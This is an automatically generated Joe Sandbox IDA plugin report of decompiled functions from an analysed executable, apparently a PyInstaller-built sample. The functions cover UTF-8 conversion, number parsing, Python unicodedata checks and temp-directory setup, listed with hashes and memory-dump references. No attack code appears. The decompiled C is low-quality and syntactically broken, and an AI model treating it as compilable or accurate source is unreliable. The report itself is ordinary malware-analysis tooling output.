Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: f1433c8640d626ae4189be2b9051fdea489fba53c429c99114fc43a8c07ed26a
Instruction ID: ad47007ded1f2d7a46695296f99cf3b71f46c3b88742d8df01db5324743fd2d0
Opcode Fuzzy Hash: f1433c8640d626ae4189be2b9051fdea489fba53c429c99114fc43a8c07ed26a
Instruction Fuzzy Hash: 58218F31A08B4389FB12AF11E84007DF761BB94B90BC84176CE4D43796EF7CE5258310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E91B4 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00007FF77FF7DA8E91B4(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, void* __r9, void* __r10, void* __r11, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				long long _v176;
				long long _v184;
				void* __rsi;
				void* __rbp;
				void* _t163;
				signed int _t169;
				signed short _t208;
				signed short _t209;
				signed int _t210;
				signed int _t245;
				intOrPtr _t259;
				signed int _t260;
				signed int _t264;
				signed int _t265;
				signed int _t268;
				signed short* _t391;
				signed short* _t392;
				signed short* _t393;
				signed short* _t395;
				signed short** _t396;
				long long _t397;
				long long* _t400;
				signed short* _t401;
				long long* _t405;
				long long* _t406;
				long long* _t407;
				signed short** _t408;
				void* _t409;
				long long _t410;
				signed short* _t415;
				signed short* _t416;
				void* _t418;
				void* _t419;
				long long _t420;
				signed short* _t421;
				intOrPtr _t422;

				_t419 = __r11;
				_t418 = __r10;
				_t414 = __r8;
				_t405 = __rdx;
				_t397 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t420 =  *((intOrPtr*)(__rdx));
				_t265 = r9b & 0xffffffff;
				r15d = r8d;
				_v72 = _t420;
				_t408 = __rdx;
				if (_t420 != 0) goto 0xda8e91fe;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				goto 0xda8e9230;
				if (r15d == 0) goto 0xda8e9248;
				_t4 = _t414 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0xda8e9248;
				_v176 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v184 = _t410;
				E00007FF77FF7DA8E9C34(__rax, __rbx, __rcx, __rdx, _t409, _t410, __r8);
				_t400 = _t408[1];
				if (_t400 == 0) goto 0xda8e989a;
				 *_t400 =  *_t408;
				goto 0xda8e989a;
				_t10 = _t420 + 2; // 0x2
				 *_t405 = _t10;
				r14d = 0;
				if ( *((intOrPtr*)(_t400 + 0x28)) != bpl) goto 0xda8e9272;
				E00007FF77FF7DA8E3970(_t10, _t397, _t400, _t409);
				goto 0xda8e9272;
				_t389 =  *_t408;
				 *_t408 =  &(( *_t408)[1]);
				if (E00007FF77FF7DA8E792C( *_t389 & 0xffff, 8, _t397, _t400) != 0) goto 0xda8e9265;
				_t267 =  !=  ? _t265 : _t265 | 0x00000002;
				_t12 = _t397 - 0x2b; // -43
				if ((0x0000fffd & _t12) != 0) goto 0xda8e92a9;
				_t391 =  *_t408;
				_t208 =  *_t391 & 0x0000ffff;
				_t392 =  &(_t391[1]);
				 *_t408 = _t392;
				_a16 = 0xa70;
				_v168 = 0xae6;
				_v164 = 0xaf0;
				_v160 = 0xb66;
				r8d = 0x660;
				_v156 = 0xb70;
				_t20 = _t392 - 0x80; // 0x5e0
				r11d = _t20;
				_v152 = 0xc66;
				r9d = 0x6f0;
				_v148 = 0xc70;
				r10d = 0x966;
				_v144 = 0xce6;
				_v140 = 0xcf0;
				_v136 = 0xd66;
				_v132 = 0xd70;
				_v128 = 0xe50;
				_v124 = 0xe5a;
				_v120 = 0xed0;
				_v116 = 0xeda;
				_v112 = 0xf20;
				_v108 = 0xf2a;
				_v104 = 0x1040;
				_v100 = 0x104a;
				_v96 = 0x17e0;
				_v92 = 0x17ea;
				_v88 = 0x1810;
				_v84 = 0xff1a;
				_v80 = 0x19;
				if ((r15d & 0xffffffef) != 0) goto 0xda8e95e9;
				if (_t208 - 0x30 < 0) goto 0xda8e9571;
				if (_t208 - 0x3a >= 0) goto 0xda8e93c0;
				goto 0xda8e956c;
				if (_t208 - 0xff10 >= 0) goto 0xda8e955d;
				if (_t208 - r8w < 0) goto 0xda8e9571;
				if (_t208 - 0x66a >= 0) goto 0xda8e93e8;
				goto 0xda8e956c;
				if (_t208 - r9w < 0) goto 0xda8e9571;
				if (_t208 - 0x6fa >= 0) goto 0xda8e9407;
				goto 0xda8e956c;
				if (_t208 - r10w < 0) goto 0xda8e9571;
				if (_t208 - 0x970 >= 0) goto 0xda8e9426;
				goto 0xda8e956c;
				if (_t208 - r11w < 0) goto 0xda8e9571;
				if (_t208 - 0x9f0 >= 0) goto 0xda8e9445;
				goto 0xda8e956c;
				if (_t208 - (_t208 & 0x0000ffff) - r11d < 0) goto 0xda8e9571;
				if (_t208 - _a16 >= 0) goto 0xda8e9465;
				goto 0xda8e956c;
				if (_t208 - _v168 < 0) goto 0xda8e9571;
				if (_t208 - _v164 < 0) goto 0xda8e93b6;
				if (_t208 - _v160 < 0) goto 0xda8e9571;
				if (_t208 - _v156 < 0) goto 0xda8e93b6;
				if (_t208 - _v152 < 0) goto 0xda8e9571;
				if (_t208 - _v148 < 0) goto 0xda8e93b6;
				if (_t208 - _v144 < 0) goto 0xda8e9571;
				if (_t208 - _v140 < 0) goto 0xda8e93b6;
				if (_t208 - _v136 < 0) goto 0xda8e9571;
				if (_t208 - _v132 < 0) goto 0xda8e93b6;
				if (_t208 - _v128 < 0) goto 0xda8e9571;
				if (_t208 - _v124 < 0) goto 0xda8e93b6;
				if (_t208 - _v120 < 0) goto 0xda8e9571;
				if (_t208 - _v116 < 0) goto 0xda8e93b6;
				if (_t208 - _v112 < 0) goto 0xda8e9571;
				if (_t208 - _v108 < 0) goto 0xda8e93b6;
				if (_t208 - _v104 < 0) goto 0xda8e9571;
				if (_t208 - _v100 < 0) goto 0xda8e93b6;
				if (_t208 - _v96 < 0) goto 0xda8e9571;
				if (_t208 - _v92 < 0) goto 0xda8e93b6;
				if ((_t208 & 0x0000ffff) - _v88 - 9 > 0) goto 0xda8e9571;
				goto 0xda8e93b6;
				if (_t208 - _v84 >= 0) goto 0xda8e9571;
				if ((_t208 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xda8e9597;
				_t259 = _v80;
				_t66 = _t400 - 0x41; // 0x6af
				_t67 = _t400 - 0x61; // 0x68f
				_t163 = _t67;
				if (_t66 - _t259 <= 0) goto 0xda8e958d;
				if (_t163 - _t259 > 0) goto 0xda8e9643;
				if (_t163 - _t259 > 0) goto 0xda8e9594;
				_t68 = _t400 - 0x37; // 0x5d9
				r10d = 0;
				if (_t68 != 0) goto 0xda8e9646;
				_t401 =  *_t408;
				r9d = 0xffdf;
				_t260 =  *_t401 & 0x0000ffff;
				_t69 =  &(_t401[1]); // 0xffe1
				_t415 = _t69;
				 *_t408 = _t415;
				_t70 = _t405 - 0x58; // -63
				if ((r9w & _t70) == 0) goto 0xda8e9627;
				 *_t408 = _t401;
				_t73 = _t418 + 8; // 0x8
				_t167 =  !=  ? r15d : _t73;
				r15d =  !=  ? r15d : _t73;
				if (_t260 == 0) goto 0xda8e95ec;
				if ( *_t401 == _t260) goto 0xda8e95ec;
				E00007FF77FF7DA8E4394(_t392);
				 *_t392 = 0x16;
				_t169 = E00007FF77FF7DA8E9D00();
				r10d = 0;
				r11d = 0x61;
				r9d = (_t169 | 0xffffffff) / r15d;
				r13d = 0xff10;
				_t78 = _t419 - 0x31; // 0x5af
				r12d = _t78;
				if (_t208 - r12w < 0) goto 0xda8e97db;
				if (_t208 - 0x3a >= 0) goto 0xda8e964d;
				goto 0xda8e97d6;
				_t209 =  *_t415 & 0x0000ffff;
				_t79 =  &(_t415[1]); // 0xffe3
				_t393 = _t79;
				 *_t408 = _t393;
				_t173 =  !=  ? r15d : 0x10;
				r15d =  !=  ? r15d : 0x10;
				goto 0xda8e95ec;
				r10d = 0;
				goto 0xda8e9637;
				if (_t209 - r13w >= 0) goto 0xda8e97c6;
				if (_t209 - 0x660 < 0) goto 0xda8e97db;
				if (_t209 - 0x66a >= 0) goto 0xda8e9674;
				goto 0xda8e97d6;
				if (_t209 - 0x6f0 < 0) goto 0xda8e97db;
				_t80 =  &(_t393[5]); // 0x6fa
				if (_t209 - _t80 >= 0) goto 0xda8e9694;
				goto 0xda8e97d6;
				if (_t209 - 0x966 < 0) goto 0xda8e97db;
				_t81 =  &(_t393[5]); // 0x970
				if (_t209 - _t81 < 0) goto 0xda8e968a;
				_t82 =  &(_t401[0x3b]); // 0x9e6
				if (_t209 - _t82 < 0) goto 0xda8e97db;
				_t83 =  &(_t393[5]); // 0x9f0
				if (_t209 - _t83 < 0) goto 0xda8e968a;
				_t84 =  &(_t401[0x3b]); // 0xa66
				if (_t209 - _t84 < 0) goto 0xda8e97db;
				if (_t209 - _a16 < 0) goto 0xda8e968a;
				if (_t209 - _v168 < 0) goto 0xda8e97db;
				if (_t209 - _v164 < 0) goto 0xda8e968a;
				if (_t209 - _v160 < 0) goto 0xda8e97db;
				if (_t209 - _v156 < 0) goto 0xda8e968a;
				if (_t209 - _v152 < 0) goto 0xda8e97db;
				if (_t209 - _v148 < 0) goto 0xda8e968a;
				if (_t209 - _v144 < 0) goto 0xda8e97db;
				if (_t209 - _v140 < 0) goto 0xda8e968a;
				if (_t209 - _v136 < 0) goto 0xda8e97db;
				if (_t209 - _v132 < 0) goto 0xda8e968a;
				if (_t209 - _v128 < 0) goto 0xda8e97db;
				if (_t209 - _v124 < 0) goto 0xda8e968a;
				if (_t209 - _v120 < 0) goto 0xda8e97db;
				if (_t209 - _v116 < 0) goto 0xda8e968a;
				if (_t209 - _v112 < 0) goto 0xda8e97db;
				if (_t209 - _v108 < 0) goto 0xda8e968a;
				if (_t209 - _v104 < 0) goto 0xda8e97db;
				if (_t209 - _v100 < 0) goto 0xda8e968a;
				if (_t209 - _v96 < 0) goto 0xda8e97db;
				if (_t209 - _v92 < 0) goto 0xda8e968a;
				if ((_t209 & 0x0000ffff) - _v88 - 9 > 0) goto 0xda8e97db;
				goto 0xda8e97d6;
				if (_t209 - _v84 >= 0) goto 0xda8e97db;
				if ((_t209 & 0x0000ffff) - r13d != 0xffffffff) goto 0xda8e980f;
				_t245 = _t209 & 0x0000ffff;
				if (_t245 - 0x41 < 0) goto 0xda8e97e8;
				if (_t245 - 0x5a <= 0) goto 0xda8e97f3;
				if (_t245 - r11d < 0) goto 0xda8e980c;
				if (_t209 - 0x7a > 0) goto 0xda8e980c;
				if ((_t209 & 0x0000ffff) - r11w - _v80 > 0) goto 0xda8e9807;
				goto 0xda8e980f;
				_t416 =  *_t408;
				if ((_t245 + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0xda8e984f;
				_t210 =  *_t416 & 0x0000ffff;
				_t264 = _t393 + _t401;
				r14d = _t264;
				_t114 =  &(_t416[1]); // 0x2
				 *_t408 = _t114;
				_t268 = ( !=  ? _t265 : _t265 | 0x00000002) | (r10d & 0xffffff00 | _t264 - r14d * r15d > 0x00000000 | r10d & 0xffffff00 | r14d - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0xda8e960c;
				_t422 = _a8;
				_t116 = _t416 - 2; // -2
				_t395 = _t116;
				_t421 = _v72;
				 *_t408 = _t395;
				if (_t210 == 0) goto 0xda8e9885;
				if ( *_t395 == _t210) goto 0xda8e9885;
				E00007FF77FF7DA8E4394(_t395);
				 *_t395 = 0x16;
				E00007FF77FF7DA8E9D00();
				if ((sil & 0x00000008) != 0) goto 0xda8e98a1;
				_t396 = _t408[1];
				 *_t408 = _t421;
				if (_t396 == 0) goto 0xda8e989a;
				 *_t396 = _t421;
				goto 0xda8e9933;
				r8d = 0x80000000;
				_t121 = _t416 - 1; // -1
				r9d = _t121;
				if ((sil & 0x00000004) == 0) goto 0xda8e98ba;
				goto 0xda8e98d8;
				if ((sil & 0x00000001) == 0) goto 0xda8e9919;
				if ((bpl & sil) == 0) goto 0xda8e98cc;
				if (r14d - r8d <= 0) goto 0xda8e991e;
				goto 0xda8e98d1;
				if (r14d - r9d <= 0) goto 0xda8e9921;
				 *((char*)(_t422 + 0x30)) = 1;
				 *((intOrPtr*)(_t422 + 0x2c)) = 0x22;
				if ((_t268 & 0x00000001) != 0) goto 0xda8e98f1;
				r14d = r14d | 0xffffffff;
				goto 0xda8e9921;
				_t406 = _t408[1];
				if ((0x00000002 & _t268) == 0) goto 0xda8e9909;
				if (_t406 == 0) goto 0xda8e9904;
				 *_t406 =  *_t408;
				goto 0xda8e9933;
				if (_t406 == 0) goto 0xda8e9914;
				 *_t406 =  *_t408;
				goto 0xda8e9933;
				if ((bpl & sil) == 0) goto 0xda8e9921;
				r14d =  ~r14d;
				_t407 = _t408[1];
				if (_t407 == 0) goto 0xda8e9930;
				 *_t407 =  *_t408;
				return r14d;
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E91F7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E95E4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E9880

Strings

f, xrefs: 00007FF7DA8E9319
p, xrefs: 00007FF7DA8E92A9
p, xrefs: 00007FF7DA8E9321

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
Instruction ID: 3d6dbb7c927b26ff8ba6c76f16138c58101197391a156b1f35ba7e2b1af69be1
Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
Instruction Fuzzy Hash: E1129E71A08143C6FB22BE15D0546BDF691FB60750FC44077DE9A066C6DFBEEAA08B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD863CFC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140 ref: 00007FFCFDA58199
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA581B4
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA581CD

Strings

file, xrefs: 00007FFCFDA58161, 00007FFCFDA581A6
T, xrefs: 00007FFCFDA5824A
..\s\crypto\store\store_lib.c, xrefs: 00007FFCFDA5822B, 00007FFCFDA58243

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _stricmpstrchrstrncmp
String ID: ..\s\crypto\store\store_lib.c$T$file
API String ID: 3017659097-909561481
Opcode ID: 972cf28d64957f1f9706c65b830387e12e6d4d1d06ab10a153e9ffed294f440a
Instruction ID: 744f0beb0136837fac89eb2c37ba613176c0c4c43be506f9b6e10cf289c06b4e
Opcode Fuzzy Hash: 972cf28d64957f1f9706c65b830387e12e6d4d1d06ab10a153e9ffed294f440a
Instruction Fuzzy Hash: 2041C732619A6A86EB11AF21E8606A9B7A0FF44B94F444030EE6D077D5FF3CD505C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7BA0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 99COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D7C35
MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D7C77

Strings

MultiByteToWideChar, xrefs: 00007FF7DA8D7CBD
Failed to get wchar_t buffer size., xrefs: 00007FF7DA8D7CB6
Out of memory., xrefs: 00007FF7DA8D7CA6
Failed to decode wchar_t from UTF-8, xrefs: 00007FF7DA8D7C9D
win32_utils_from_utf8, xrefs: 00007FF7DA8D7CAD

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 626452242-876015163
Opcode ID: 621835e95deb0ee244408a167ace6c9f9523e463970a4000df62c3940199f77a
Instruction ID: 0e09a6cabd6015ca548be7467f349687970a08901be1a56bac06b23c241a8040
Opcode Fuzzy Hash: 621835e95deb0ee244408a167ace6c9f9523e463970a4000df62c3940199f77a
Instruction Fuzzy Hash: CE41C532A08B438AFA22EF15E44056DE2A5FB54790FD80176EE4D47B96DF3CD562C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD745004 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON310 ref: 00007FFCFD74503F
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD745074
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD745088

Strings

numeric, xrefs: 00007FFCFD745038, 00007FFCFD745066
argument 1, xrefs: 00007FFCFD74506D
a unicode character, xrefs: 00007FFCFD74505F

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
String ID: a unicode character$argument 1$numeric
API String ID: 3545102714-2385192657
Opcode ID: 910603b388ac8663005a7d36a4b721a837b516f36f35cbb36a759c2616a32f0f
Instruction ID: 6ab43e5beefe840e4b173163516f08a14dacc7655728ee2ce785ba10bd66e684
Opcode Fuzzy Hash: 910603b388ac8663005a7d36a4b721a837b516f36f35cbb36a759c2616a32f0f
Instruction Fuzzy Hash: EE318625B18A6AC1EB524B15D46027DA361EB46B85F948032DA2D4B7ECEF3DD846C3F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744E38 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON310 ref: 00007FFCFD744E73
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD744EA8
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD744EBC

Strings

argument 1, xrefs: 00007FFCFD744EA1
name, xrefs: 00007FFCFD744E6C, 00007FFCFD744E9A
a unicode character, xrefs: 00007FFCFD744E93

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
String ID: a unicode character$argument 1$name
API String ID: 3545102714-4190364640
Opcode ID: bf24b6ba884f47bb0cce4861fece50e8f2ecd0e547af09c8d9dfd2d108f0a873
Instruction ID: d99679f4e2a1e967a67af6ac6a3b0258c1784ab993ba602952c6a260aa7519ec
Opcode Fuzzy Hash: bf24b6ba884f47bb0cce4861fece50e8f2ecd0e547af09c8d9dfd2d108f0a873
Instruction Fuzzy Hash: 7E31A721B18A6AC1EB514B16D46026EA351EF85B89F588037DE2C4B7DCEF7DD806D3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD74435C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON310 ref: 00007FFCFD744397
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD7443CC
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD7443E0

Strings

argument 1, xrefs: 00007FFCFD7443C5
a unicode character, xrefs: 00007FFCFD7443B7
decimal, xrefs: 00007FFCFD744390, 00007FFCFD7443BE

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
String ID: a unicode character$argument 1$decimal
API String ID: 3545102714-2474051849
Opcode ID: 4a0eb80019097f1447480b8d7575f1519ad7e629deb1d4dba1b5699d0132ebf0
Instruction ID: bcff4a9a68e2dbd0c30ce2b158b8bddf4ddaf8190bfa582cd3d33f533400a5aa
Opcode Fuzzy Hash: 4a0eb80019097f1447480b8d7575f1519ad7e629deb1d4dba1b5699d0132ebf0
Instruction Fuzzy Hash: DD31A761B08A6EC1EB514B0AD46027DA251EB41B89F544032DE6C4B7DDEF7DE812D3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D6460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FF77FF7DA8D6460(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __r8, char _a24, char _a8216, signed int _a16408, long long _a16448) {
				void* __rdi;
				long _t18;
				void* _t36;
				void* _t42;
				void* _t43;
				signed long long _t52;
				signed long long _t53;
				long long _t55;
				signed long long _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t91;
				void* _t92;
				void* _t93;

				_t86 = __r8;
				_t55 = __rbx;
				_t36 = __edx;
				E00007FF77FF7DA8DAD20(0x4030, __rax, _t92, _t93);
				_t84 = _t83 - __rax;
				_t52 =  *0xda90d008; // 0xe3add53f52b8
				_t53 = _t52 ^ _t83 - __rax;
				_a16408 = _t53;
				_t74 = __rcx;
				r8d = 0;
				E00007FF77FF7DA8D79A0(_t53, __rbx, __rcx, __rcx, _t81, __r8);
				if (_t53 != 0) goto 0xda8d64a9;
				E00007FF77FF7DA8D2770(_t53, "LOADER: Failed to convert runtime-tmpdir to a wide string.\n", _t74, _t86, _t91);
				goto 0xda8d65b8;
				r8d = 0x1000;
				_a16448 = _t55;
				_t18 = ExpandEnvironmentStringsW(??, ??, ??);
				E00007FF77FF7DA8E3FEC(0, _t53,  &_a24, _t86);
				if (_t18 != 0) goto 0xda8d64e6;
				E00007FF77FF7DA8D2770(_t53, "LOADER: Failed to expand environment variables in the runtime-tmpdir.\n",  &_a24, _t86, _t91);
				goto 0xda8d65b0;
				if (E00007FF77FF7DA8D7710(_t55,  &_a24) == 0) goto 0xda8d6500;
